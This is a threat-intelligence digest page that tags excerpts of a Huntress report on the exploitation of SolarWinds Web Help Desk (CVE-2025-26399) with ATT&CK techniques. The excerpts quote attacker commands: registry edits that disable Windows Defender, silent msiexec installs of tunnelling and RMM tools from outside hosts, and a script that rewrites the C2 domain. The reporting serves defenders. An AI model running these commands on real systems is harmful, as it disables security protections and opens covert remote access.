TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Active Exploitation of SolarWinds Web Help Desk (CVE-2025-26399)

2026-02-08 · Read original ↗

ATT&CK techniques detected

14 predictions
T1112Modify Registry
100%
“v start / t reg _ dword / d 4 / f reg add " hklm \ software \ policies \ microsoft \ windows defender " / v disableantispyware / t reg _ dword / d 1 / f reg add " hklm \ software \ policies \ microsoft \ windows defender \ real - time protection " / v disablebehaviormonitoring / …”
T1059.001PowerShell
100%
“powershell commands via the velociraptor agent, all following the same execution pattern : powershell. exe - executionpolicy unrestricted - encodedcommand. this is consistent with velociraptor ' s default method for executing powershell on endpoints, where commands are base64 - e…”
T1190Exploit Public-Facing Application
100%
“active exploitation of solarwinds web help desk ( cve - 2025 - 26399 ) acknowledgments : special thanks to dipo rodipe, dray agha, and lindon wass for their contributions to this investigation and write - up. tl ; dr : huntress has observed threat actors exploiting solarwinds web…”
T1059.001PowerShell
99%
“defenders with endpoint monitoring and artifact collection, its capabilities, such as remote command execution, file retrieval, and process execution via vql queries, make it equally effective as a c2 framework when pointed at attacker - controlled infrastructure. the uncovered v…”
T1053.005Scheduled Task
98%
“a redundancy measure in case the earlier powershell - based elastic cloud exfiltration did not succeed. velociraptor service restart the last event observed in this chain was the velociraptor service restarting at 12 : 38 : 41 utc, consistent with the c2 failover script calling r…”
T1190Exploit Public-Facing Application
79%
“. in one case, qemu was no longer on the machine, which came in compromised. it is unclear if the attacker cleaned up after themselves, or if that part of the attack was just unsuccessful in general. the earliest known instance of this persistence mechanism was installed on janua…”
T1572Protocol Tunneling
77%
“windows defender \ spynet " / v spynetreporting / t reg _ dword / d 0 / f vs code tunnel binary download from supabase approximately a second after disabling defender, the threat actor downloaded a fresh copy of the vs code binary : code. exe at the same path via get - filehash. …”
T1018Remote System Discovery
69%
“##hold, they executed active directory discovery commands to enumerate domain - joined machines via net group " domain computers " / do, a textbook reconnaissance technique aimed at identifying viable targets for lateral movement. figure 2 : huntress detection of domain reconnais…”
T1041Exfiltration Over C2 Channel
49%
“url : msiexec / q / i hxxps : / / github [. ] com / cloudflare / cloudflared / releases / latest / download / cloudflared - windows - amd64. msi this establishes an additional tunnel - based channel alongside the existing velociraptor c2 connection, giving the threat actor redund…”
T1008Fallback Channels
42%
“with an http 406 ( not acceptable ) status code, the script rewrites the velociraptor client. config. yaml on disk, replacing the current c2 domain auth. qgtxtebl. workers [. ] dev with v2 - api. mooo [. ] com, and restarts the velociraptor service to pick up the new configuratio…”
T1190Exploit Public-Facing Application
42%
“database, and cve - 2025 - 26399 was just recently discussed by microsoft and other vendors who have also observed active in - the - wild exploitation. all previous versions of solarwinds web help desk prior to 12. 8. 7 hf1 are vulnerable to these vulnerabilities. you can find th…”
T1219Remote Access Tools
42%
“##iexec / q / i hxxps : / / files. catbox [. ] moe / tmp9fc. msi the adversary leveraged the file - hosting service catbox to stage a zoho manageengine rmm agent, a legitimate remote management tool that may be abused by threat actors to maintain persistent, hands - on access to …”
T1047Windows Management Instrumentation
41%
“whd administrative interfaces should not be publicly accessible. place whd behind a vpn or firewall and remove direct internet access to admin paths. - reset passwords for all service accounts, administrator accounts, and any credentials accessible through or stored within the wh…”
T1112Modify Registry
31%
“trial deployment on elastic ' s legitimate saas infrastructure hosted on gcp. in an ironic twist, the threat actor essentially built themselves a siem, using elastic, no less - - to triage their victims. every compromised host phones home with its full system profile to a central…”

Summary

Huntress has observed active exploitation of a deserialization and remote code execution against the SolarWinds Web Help Desk software (CVE-2025-26399).